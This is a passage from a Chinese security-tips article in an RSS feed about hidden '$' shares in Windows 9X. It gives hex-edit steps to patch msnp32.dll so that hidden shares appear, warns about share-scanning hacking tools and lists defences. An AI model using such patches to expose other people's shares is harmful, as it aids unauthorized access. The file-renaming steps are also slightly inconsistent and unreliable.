</p><p>除此以外，我们还应让Windows能显示出隐藏的共享。大家都知道，在Windows 9X中设置共享时，通过在共享名后加上&ldquo;$&rdquo;这个符号，可使共享隐藏。比如，我们给一个名为share的计算机的C盘设置共享时，只要将其共享名设为C$。这样我们将看不到被共享的C盘，只有通过输入该共享的确切路径，才能访问此共享。不过我们只要用将电脑中的msnp32.dll文件稍做修改。就可以让Windows显示出隐藏的共享。 
</p><p>由于在Windows下msnp32.dll会被调用，不能直接修改此文件，所以第一步我们要复制msnp32.dll到C盘下并改名为msnp32，msnp32.dll在C:\Windows\system文件夹下。运行UltraEdit等十六进制文件编辑器打开msnp32，找到&ldquo;24 56 E8 17&rdquo;（位于偏移地址00003190～000031A0处），找到后将&ldquo;24&rdquo;改为&ldquo;00&rdquo;，然后保存，关闭UltraEdit。重启计算机进入DOS模式，在命令提示符下输入copy c:\msnp32.dll c:\Windows\system\msnp32.dll，重启进入Windows，现在双击share就能看见被隐藏的共享了。 
</p><p>最后要提醒大家利用TCP/IP协议设计的NethackerⅡ等黑客软件可以穿过Internet网络，找到共享的主机，然后进行相应操作。所以当您通过Modem上网时，千万要小心，因为一不小心，您的主机将完全共享给对方了。防范这类事情发生的方法无非是经常检查系统，给系统打上补丁，经常使用反黑杀毒软件，上网时打开防火墙，注意异常现象，留意AutoRun.inf文件的内容，关闭共享或不要设置为完全共享，且加上复杂的共享密码。 
</p><p>声明：本文的目的是使大家能清楚地了解网上流行的黑客手段，增强自己的防护意识，因此请大家不要用本文的方法去干违法的事情，切记：己所不欲，勿施于人！</p>]]></description>
		</item>
		    
		
	</channel>
</rss>
